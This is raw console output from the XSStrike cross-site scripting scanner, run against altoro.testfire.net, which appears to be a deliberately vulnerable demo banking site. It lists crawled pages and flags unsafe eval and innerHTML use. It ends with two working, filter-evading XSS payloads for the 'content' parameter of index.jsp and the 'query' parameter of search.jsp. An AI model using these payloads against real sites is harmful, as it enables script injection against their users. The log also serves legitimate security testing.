[91m
	XSStrike [97mv3.1.5
[0m
[97m[~][0m Crawling the target [0m
[97m[~][0m Parsing                                          [0m[97m[~][0m Parsing index.jsp?content=business_deposit.htm   [0m[97m[~][0m Parsing subscribe.jsp                            [0m[97m[~][0m Parsing index.jsp?content=personal_other.htm     [0m[97m[~][0m Parsing swagger/index.html                       [0m[97m[~][0m Parsing cgi.exe                                  [0m[97m[~][0m Parsing index.jsp?content=security.htm           [0m[97m[~][0m Parsing index.jsp?content=inside.htm             [0m[97m[~][0m Parsing index.jsp?content=inside_about.htm       [0m[97m[~][0m Parsing dex.jsp?content=personal_investments.htm [0m[97m[~][0m Parsing index.jsp?content=personal_deposit.htm   [0m[97m[~][0m Parsing index.jsp?content=personal_loans.htm     [0m[97m[~][0m Parsing index.jsp?content=business_lending.htm   [0m[97m[~][0m Parsing login.jsp                                [0m[97m[~][0m Parsing index.jsp?content=business_other.htm     [0m[97m[~][0m Parsing feedback.jsp                             [0m[97m[~][0m Parsing ndex.jsp?content=business_retirement.htm [0m[97m[~][0m Parsing index.jsp?content=business_insurance.htm [0m[97m[~][0m Parsing index.jsp                                [0m[!!] Unable to connect to the target. [0m
[97m[~][0m Parsing index.jsp?content=personal.htm           [0m[97m[~][0m Parsing index.jsp?content=business_cards.htm     [0m[97m[~][0m Parsing index.jsp?content=privacy.htm            [0m[97m[~][0m Parsing index.jsp?content=business.htm           [0m[97m[~][0m Parsing index.jsp?content=personal_savings.htm   [0m[97m[~][0m Parsing survey_questions.jsp                     [0m[97m[~][0m Parsing index.jsp?content=inside_contact.htm     [0m[97m[~][0m Parsing default.jsp?content=security.htm         [0m[97m[~][0m Parsing index.jsp?content=inside_investor.htm    [0m[97m[~][0m Parsing status_check.jsp                         [0m[97m[~][0m Parsing index.jsp?content=personal_checking.htm  [0m[97m[~][0m Parsing index.jsp?content=inside_careers.htm     [0m[97m[~][0m Parsing index.jsp?content=inside_press.htm       [0m[97m[~][0m Parsing index.jsp?content=personal_cards.htm     [0m[92m[+][0m Potentially vulnerable objects found at http://altoro.testfire.net/swagger/index.html [0m
[91m------------------------------------------------------------[0m
6   url: window.[93m[93mlocation.href[0m[0m.substr(0, window.[93m[93mlocation.href[0m[0m.lastIndexOf("\/") + 1) + "properties.json",
[91m------------------------------------------------------------[0m
[92m[+][0m Potentially vulnerable objects found at http://altoro.testfire.net/status_check.jsp [0m
[91m------------------------------------------------------------[0m
38  		var jsonObj = [91meval[0m('('+ xmlHttp.responseText + ')');43  		[91mx.innerHTML[0m=jsonFetchHostName;45  		[91mx.innerHTML[0m=jsonFetchHostStatus;50  		[91mx.innerHTML[0m=sLastHostName;52  		[91mx.innerHTML[0m='The service returned an error. Please be patient while our administrators fix the issue.';57  		[91mx.innerHTML[0m=sLastHostName;59  		[91mx.innerHTML[0m='The service returned an error. The status service appears to not be available';64  		[91mx.innerHTML[0m=sLastHostName;66  		[91mx.innerHTML[0m='The service returned a 401 unauthorized error, indicating it was implemented incorrectly';71  		[91mx.innerHTML[0m=sLastHostName;73  		[91mx.innerHTML[0m='The service returned a 302 redirect, indicating it was implemented incorrectly';[91m------------------------------------------------------------[0m
[93m[!][0m Progress: 10/57 [0m[93m[!][0m Progress: 20/57 [0m[93m[!][0m Progress: 30/57 [0m[93m[!][0m Progress: 40/57 [0m[93m[!][0m Progress: 50/57 [0m[92m[++][91m Vulnerable webpage: [92mhttp://altoro.testfire.net/index.jsp[0m [0m
[92m[++][91m Vector for [92mcontent[0m: <htmL%09onPOinTereNter%09=%09(prompt)``> [0m
[92m[++][91m Vulnerable webpage: [92mhttp://altoro.testfire.net/search.jsp[0m [0m
[92m[++][91m Vector for [92mquery[0m: <DeTAiLs%0aOnTOGglE%0d=%0d(prompt)``> [0m
[93m[!][0m Progress: 57/57 [0m
